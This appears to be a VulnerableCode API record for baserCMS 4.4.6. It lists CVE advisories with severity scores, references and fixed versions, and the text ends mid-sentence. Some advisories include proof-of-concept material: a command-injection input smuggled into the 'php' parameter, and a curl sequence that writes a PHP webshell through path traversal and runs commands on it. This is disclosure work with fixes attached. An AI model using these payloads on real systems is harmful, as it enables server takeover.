Package Instance
Lookup for vulnerable packages by Package URL.
GET /api/packages/533055?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/533055?format=api", "purl": "pkg:composer/baserproject/basercms@4.4.6", "type": "composer", "namespace": "baserproject", "name": "basercms", "version": "4.4.6", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": "5.2.3", "latest_non_vulnerable_version": "5.2.3", "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91611?format=api", "vulnerability_id": "VCID-3new-f12y-8bf9", "summary": "baserCMS has Unsafe File Upload Leading to Remote Code Execution (RCE)\n### Details\nThe application's restore function allows users to upload a `.zip` file, which is then automatically extracted. A PHP file inside the archive is included using `require_once` without validating or restricting the filename. An attacker can craft a malicious PHP file within the zip and achieve arbitrary code execution when it is included.\n\nVector: Malicious ZIP upload + insecure `require_once`\n\n### PoC\n1. Restore backup\n \n1. Load file shell (insecure `require_once`)\n \n \n\n### Impact\nRemote Code Execution (RCE)", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-32957", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00031", "scoring_system": "epss", "scoring_elements": "0.09459", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-32957" }, { "reference_url": "https://basercms.net/security/JVN_20837860", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T18:39:21Z/" } ], "url": "https://basercms.net/security/JVN_20837860" }, { "reference_url": "https://github.com/baserproject/basercms", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms" }, { "reference_url": "https://github.com/baserproject/basercms/releases/tag/5.2.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T18:39:21Z/" } ], "url": "https://github.com/baserproject/basercms/releases/tag/5.2.3" }, { "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-hv78-cwp4-8r7r", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T18:39:21Z/" } ], "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-hv78-cwp4-8r7r" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-32957", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-32957" }, { "reference_url": "https://github.com/advisories/GHSA-hv78-cwp4-8r7r", "reference_id": "GHSA-hv78-cwp4-8r7r", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-hv78-cwp4-8r7r" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/112578?format=api", "purl": "pkg:composer/baserproject/basercms@5.2.3", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3" } ], "aliases": [ "CVE-2025-32957", "GHSA-hv78-cwp4-8r7r" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-3new-f12y-8bf9" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91137?format=api", "vulnerability_id": "VCID-4zw8-truk-pugf", "summary": "baserCMS has OS Command Injection Leading to Remote Code Execution (RCE)\n## Summary\n\nIn the core update functionality of baserCMS, some parameters sent from the admin panel are passed to the `exec()` function without proper validation or escaping. This issue allows **an authenticated CMS administrator to execute arbitrary OS commands on the server (Remote Code Execution, RCE)**.\n\nThis vulnerability is not a UI-level issue such as screen manipulation or lack of CSRF protection, but rather stems from **a design that directly executes input values received on the server side as OS commands**. Therefore, even if buttons are hidden in the UI, or even if CakePHP's CSRF/FormProtection (SecurityComponent) ensures that only legitimate POST requests are accepted, **an attack is possible as long as a request containing a valid token is processed within an administrator session**.\n\n---\n\n## Vulnerability Information\n\n| Item | Details |\n| ---- | ------- |\n| CWE | CWE-78: Improper Neutralization of Special Elements used in an OS Command |\n| Impact | Remote Code Execution (RCE) |\n| Severity | Critical |\n| Attack Requirements | Administrator privileges required |\n| Reproducibility | Reproducible (confirmed multiple times) |\n| Test Environment | baserCMS 5.2.2 (Docker / development environment) |\n\n---\n\n## Affected Areas\n\n- **Controller**\n - `PluginsController::get_core_update()`\n- **Service**\n - `PluginsService::getCoreUpdate()`\n- **Affected Endpoint**\n - `/baser/admin/baser-core/plugins/get_core_update`\n\n---\n\n## Technical Details\n\n### Vulnerable Code Flow\n\n```text\nPluginsController::get_core_update()\n ↓ Retrieves php parameter from POST data\nPluginsService::getCoreUpdate($targetVersion, $php, $force)\n ↓ Concatenates $php into command string without validation or escaping\nexec($command)\n```\n\n### Relevant Code (Excerpt)\n\n**PluginsController.php**\n\n```php\n$service->getCoreUpdate(\n $request->getData('targetVersion') ?? '',\n $request->getData('php') ?? 'php',\n $request->getData('force'),\n);\n```\n\n**PluginsService.php**\n\n```php\n$command = $php . ' ' . ROOT . DS . 'bin' . DS . 'cake.php composer ' .\n $targetVersion . ' --php ' . $php . ' --dir ' . TMP . 'update';\n\nexec($command, $out, $code);\n```\n\nThe `$php` parameter is user input, and **none** of the following countermeasures are in place:\n\n- Restriction via allowlist\n- Validation via regular expression\n- Escaping via `escapeshellarg()` or similar\n\n---\n\n## Attack Scenario\n\n1. The attacker logs in as a CMS administrator\n2. Sends a POST request to the core update functionality in the admin panel\n3. Specifies a string containing OS commands in the `php` parameter\n4. `exec()` is executed on the server side, running the arbitrary OS command\n\n### Example Attack Input (Conceptual)\n\n```text\nphp=php;id>/tmp/rce_test;#\n```\n\n---\n\n## Verification Results (PoC)\n\n### Execution Result\n\n```bash\n$ docker exec bc-php cat /tmp/rce_test\nuid=1000(www-data) gid=1000(www-data) groups=1000(www-data)\n```\n\nThe above confirms that OS commands can be executed with `www-data` privileges.\n\n### Additional Notes\n\n- Reproducible through the legitimate flow in the admin panel (browser)\n- Succeeds even with CSRF/FormProtection tokens included in a legitimate request\n- Failure cases (400/403) have also been investigated and differentiated\n- Confirmed reproducible via resending HTTP requests with tools such as curl (resending the same request containing valid tokens)\n\n---\n\n## Impact\n\nIf this vulnerability is exploited, the following becomes possible:\n\n- Retrieval of server information\n- Reading/writing arbitrary files\n- Retrieval of application configuration information (DB credentials, etc.)\n- OS-level operations beyond application permission boundaries\n\nAlthough administrator privileges are required, **this is a design issue where the impact extends from the application layer to the OS layer**, and the impact is considered significant.\n\n---\n\n## Recommended Fix\n\n### Primary Recommendation\n\n- Do not accept the PHP executable path from user input\n- Fix the PHP executable on the server side using the `PHP_BINARY` constant\n\n```php\n$php = escapeshellarg(PHP_BINARY);\n```\n\n### Supplementary Fix Recommendations\n\n- Apply `escapeshellarg()` escaping to other command-line arguments (version number, directory, etc.) as well\n- If possible, consider using execution methods that do not involve shell interpretation (array format, Process class, etc.)\n\n### Alternative (Not Recommended)\n\n- Allowlist validation for the PHP executable path\n- Combined use of regex validation and `escapeshellarg()`\n\nHowever, **from the perspective of reducing the attack surface, a design that eliminates user input entirely is recommended**.\n\n---\n\n## Additional Notes\n\n- This issue is independent of UI display controls (showing/hiding buttons)\n- As long as the endpoint exists, an attack is possible if a request containing valid tokens is processed\n- This is a problem stemming from the design-level handling of input, and cannot be prevented by CSRF or UI controls alone\n\n---\n\n## Conclusion\n\nDue to a design issue in baserCMS's core update functionality where user input is passed to `exec()` without validation, **Remote Code Execution (RCE) is achievable with administrator privileges**. This vulnerability can be fixed through input validation and design review, and prompt remediation is recommended.\n\nThis advisory was translated from Japanese to English using GitHub Copilot.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-21861", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00131", "scoring_system": "epss", "scoring_elements": "0.32198", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-21861" }, { "reference_url": "https://basercms.net/security/JVN_20837860", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T14:01:36Z/" } ], "url": "https://basercms.net/security/JVN_20837860" }, { "reference_url": "https://github.com/baserproject/basercms", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms" }, { "reference_url": "https://github.com/baserproject/basercms/releases/tag/5.2.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T14:01:36Z/" } ], "url": "https://github.com/baserproject/basercms/releases/tag/5.2.3" }, { "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-qxmc-6f24-g86g", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T14:01:36Z/" } ], "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-qxmc-6f24-g86g" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21861", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21861" }, { "reference_url": "https://github.com/advisories/GHSA-qxmc-6f24-g86g", "reference_id": "GHSA-qxmc-6f24-g86g", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-qxmc-6f24-g86g" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/112578?format=api", "purl": "pkg:composer/baserproject/basercms@5.2.3", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3" } ], "aliases": [ "CVE-2026-21861", "GHSA-qxmc-6f24-g86g" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-4zw8-truk-pugf" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/41774?format=api", "vulnerability_id": "VCID-5ay3-1t5g-vycu", "summary": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')\nBaserCMS is an open source content management system with a focus on Japanese language support. Users with upload privilege may upload crafted zip files capable of path traversal on the host operating system. This is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-41279", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00438", "scoring_system": "epss", "scoring_elements": "0.6349", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00438", "scoring_system": "epss", "scoring_elements": "0.63447", "published_at": "2026-06-04T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-41279" }, { "reference_url": "https://github.com/baserproject/basercms", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms" }, { "reference_url": "https://github.com/baserproject/basercms/commit/d8ab0a81a7bce35cc95ff7dff851a7e87a084336", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms/commit/d8ab0a81a7bce35cc95ff7dff851a7e87a084336" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41279", "reference_id": "CVE-2021-41279", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41279" }, { "reference_url": "https://github.com/advisories/GHSA-4x2f-54wr-4hjg", "reference_id": "GHSA-4x2f-54wr-4hjg", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-4x2f-54wr-4hjg" }, { "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-4x2f-54wr-4hjg", "reference_id": "GHSA-4x2f-54wr-4hjg", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-4x2f-54wr-4hjg" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/59671?format=api", "purl": "pkg:composer/baserproject/basercms@4.5.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3new-f12y-8bf9" }, { "vulnerability": "VCID-4zw8-truk-pugf" }, { "vulnerability": "VCID-7x3n-4c2b-nfbx" }, { "vulnerability": "VCID-8buz-nsr9-3yge" }, { "vulnerability": "VCID-8ssu-umet-37bk" }, { "vulnerability": "VCID-ays7-6wvh-augt" }, { "vulnerability": "VCID-d1sf-cmct-zbh1" }, { "vulnerability": "VCID-g56w-z9cx-5ygv" }, { "vulnerability": "VCID-ggv8-3v9t-mfea" }, { "vulnerability": "VCID-j37y-gws9-ake9" }, { "vulnerability": "VCID-jby7-s5ez-dqb3" }, { "vulnerability": "VCID-k575-suuf-7bhf" }, { "vulnerability": "VCID-k5qv-4yp3-zbgf" }, { "vulnerability": "VCID-khft-xvrw-g3dr" }, { "vulnerability": "VCID-kmpp-6j49-pqfz" }, { "vulnerability": "VCID-mfm9-gsh3-ubg8" }, { "vulnerability": "VCID-nxrf-64er-xbfx" }, { "vulnerability": "VCID-p695-t9ye-v3ga" }, { "vulnerability": "VCID-pd8c-9d7z-zkhg" }, { "vulnerability": "VCID-sqr4-v889-tff8" }, { "vulnerability": "VCID-u16w-rbuk-ybfs" }, { "vulnerability": "VCID-uedz-j2vn-cbea" }, { "vulnerability": "VCID-y2sz-c6vb-pkdp" }, { "vulnerability": "VCID-zqd4-rdem-jfgk" }, { "vulnerability": "VCID-zsgc-fnen-b7a6" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.5.4" } ], "aliases": [ "CVE-2021-41279", "GHSA-4x2f-54wr-4hjg" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-5ay3-1t5g-vycu" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91016?format=api", "vulnerability_id": "VCID-7x3n-4c2b-nfbx", "summary": "baserCMS has OS command injection vulnerability in installer\nbaserCMS has an OS command injection vulnerability in the installer.\n\n### Target\nbaserCMS 5.2.2 and earlier versions\n\n### Vulnerability\n\nIf baserCMS is placed on a server but not installed, malicious commands may be executed.\n\n### Countermeasures\nUpdate to the latest version of baserCMS\n\nPlease refer to the following page to reference for more information.\nhttps://basercms.net/security/JVN_54513170\n\n### Credits\n\nREN XINGDIAN", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30880", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00055", "scoring_system": "epss", "scoring_elements": "0.17526", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30880" }, { "reference_url": "https://basercms.net/security/JVN_20837860", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-31T15:27:05Z/" } ], "url": "https://basercms.net/security/JVN_20837860" }, { "reference_url": "https://github.com/baserproject/basercms", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms" }, { "reference_url": "https://github.com/baserproject/basercms/releases/tag/5.2.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-31T15:27:05Z/" } ], "url": "https://github.com/baserproject/basercms/releases/tag/5.2.3" }, { "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-6hpg-8rx3-cwgv", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-31T15:27:05Z/" } ], "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-6hpg-8rx3-cwgv" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30880", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30880" }, { "reference_url": "https://github.com/advisories/GHSA-6hpg-8rx3-cwgv", "reference_id": "GHSA-6hpg-8rx3-cwgv", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-6hpg-8rx3-cwgv" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/112578?format=api", "purl": "pkg:composer/baserproject/basercms@5.2.3", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3" } ], "aliases": [ "CVE-2026-30880", "GHSA-6hpg-8rx3-cwgv" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-7x3n-4c2b-nfbx" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/41773?format=api", "vulnerability_id": "VCID-891u-x525-ykbb", "summary": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')\nThere is a Potential Zip Slip Vulnerability and OS Command Injection Vulnerability on the management system of baserCMS. Users with permissions to upload files may upload crafted zip files which may execute arbitrary commands on the host operating system. This is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users. If you are eligible, please update to the new version as soon as possible.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-41243", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.02799", "scoring_system": "epss", "scoring_elements": "0.86405", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.02799", "scoring_system": "epss", "scoring_elements": "0.86382", "published_at": "2026-06-04T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-41243" }, { "reference_url": "https://github.com/baserproject/basercms", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms" }, { "reference_url": "https://github.com/baserproject/basercms/commit/9088b99c329d1faff3a2f1269f37b9a9d8d5f6ff", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms/commit/9088b99c329d1faff3a2f1269f37b9a9d8d5f6ff" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41243", "reference_id": "CVE-2021-41243", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41243" }, { "reference_url": "https://github.com/advisories/GHSA-7rpc-9m88-cf9w", "reference_id": "GHSA-7rpc-9m88-cf9w", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-7rpc-9m88-cf9w" }, { "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-7rpc-9m88-cf9w", "reference_id": "GHSA-7rpc-9m88-cf9w", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-7rpc-9m88-cf9w" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/59671?format=api", "purl": "pkg:composer/baserproject/basercms@4.5.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3new-f12y-8bf9" }, { "vulnerability": "VCID-4zw8-truk-pugf" }, { "vulnerability": "VCID-7x3n-4c2b-nfbx" }, { "vulnerability": "VCID-8buz-nsr9-3yge" }, { "vulnerability": "VCID-8ssu-umet-37bk" }, { "vulnerability": "VCID-ays7-6wvh-augt" }, { "vulnerability": "VCID-d1sf-cmct-zbh1" }, { "vulnerability": "VCID-g56w-z9cx-5ygv" }, { "vulnerability": "VCID-ggv8-3v9t-mfea" }, { "vulnerability": "VCID-j37y-gws9-ake9" }, { "vulnerability": "VCID-jby7-s5ez-dqb3" }, { "vulnerability": "VCID-k575-suuf-7bhf" }, { "vulnerability": "VCID-k5qv-4yp3-zbgf" }, { "vulnerability": "VCID-khft-xvrw-g3dr" }, { "vulnerability": "VCID-kmpp-6j49-pqfz" }, { "vulnerability": "VCID-mfm9-gsh3-ubg8" }, { "vulnerability": "VCID-nxrf-64er-xbfx" }, { "vulnerability": "VCID-p695-t9ye-v3ga" }, { "vulnerability": "VCID-pd8c-9d7z-zkhg" }, { "vulnerability": "VCID-sqr4-v889-tff8" }, { "vulnerability": "VCID-u16w-rbuk-ybfs" }, { "vulnerability": "VCID-uedz-j2vn-cbea" }, { "vulnerability": "VCID-y2sz-c6vb-pkdp" }, { "vulnerability": "VCID-zqd4-rdem-jfgk" }, { "vulnerability": "VCID-zsgc-fnen-b7a6" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.5.4" } ], "aliases": [ "CVE-2021-41243", "GHSA-7rpc-9m88-cf9w" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-891u-x525-ykbb" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91437?format=api", "vulnerability_id": "VCID-8buz-nsr9-3yge", "summary": "baserCMS Path Traversal Leads to Arbitrary File Write and RCE via Theme File API\n## Summary\n\nA path traversal vulnerability exists in the baserCMS 5.x theme file management API (`/baser/api/admin/bc-theme-file/theme_files/add.json`) that allows arbitrary file write.\n\nAn authenticated administrator can include `../` sequences in the `path` parameter to create a PHP file in an arbitrary directory outside the theme directory, which may result in remote code execution (RCE).\n\n## Affected Code\n\n**File**: `plugins/bc-theme-file/src/Service/BcThemeFileService.php`\n\n```php\npublic function getFullpath(string $theme, string $plugin, string $type, string $path)\n{\n // ...\n return $viewPath . $type . DS . $path; // $path is not sanitized\n}\n```\n\n## Attack Scenario\n\n1. The attacker compromises an administrator account (password leak, brute force, etc.)\n2. Obtains an access token via API login\n3. Specifies `path: \"../../../../webroot/\"` in the theme file creation API\n4. A PHP file is created in the webroot\n5. The attacker accesses the created PHP file to achieve RCE\n\n## Reproduction Steps\n\n```bash\n# 1. Login\ncurl -X POST \"http://target/baser/api/admin/baser-core/users/login.json\" \\\n -H \"Content-Type: application/json\" \\\n -d '{\"email\":\"admin@example.com\",\"password\":\"password\"}'\n\n# 2. Create webshell\ncurl -X POST \"http://target/baser/api/admin/bc-theme-file/theme_files/add.json\" \\\n -H \"Authorization: Bearer <token>\" \\\n -H \"Content-Type: application/json\" \\\n -d '{\n \"theme\": \"BcThemeSample\",\n \"plugin\": \"\",\n \"type\": \"layout\",\n \"path\": \"../../../../webroot/\",\n \"base_name\": \"shell\",\n \"ext\": \"php\",\n \"contents\": \"<?php system($_GET[\\\"cmd\\\"]); ?>\"\n }'\n\n# 3. RCE\ncurl \"http://target/shell.php?cmd=id\"\n```\n\n## Vulnerability Details\n\n| Item | Details |\n|------|---------|\n| CWE | CWE-22: Path Traversal, CWE-73: External Control of File Name or Path |\n| Impact | Arbitrary file write, Remote Code Execution (RCE) |\n| Attack Prerequisites | Administrator privileges + API enabled (`USE_CORE_ADMIN_API=true`), or chaining with XSS, etc. |\n| Reproducibility | High (PoC verified) |\n| Test Environment | baserCMS 5.x (Docker environment) |\n\n### Additional Notes on Attack Prerequisites\n\n- **When API is enabled** (`USE_CORE_ADMIN_API=true`): API calls can be made externally using JWT token authentication. Direct exploitation is possible.\n- **Default settings** (`USE_CORE_ADMIN_API=false`): Direct external API calls are prohibited. CSRF protection is also active, so this vulnerability alone cannot be exploited. An exploit chain involving XSS or similar is required.\n\n## Recommended Fix\n\nRather than relying on simple string replacement or blacklist checks of input, the canonicalized path (using `realpath()`, etc.) should be verified to be within the theme base directory after file creation or immediately before writing. If the path falls outside the boundary, the operation should be rejected.\n\nThe specific implementation location and method are left to the project's design decisions.\n\n## Comparison with Other 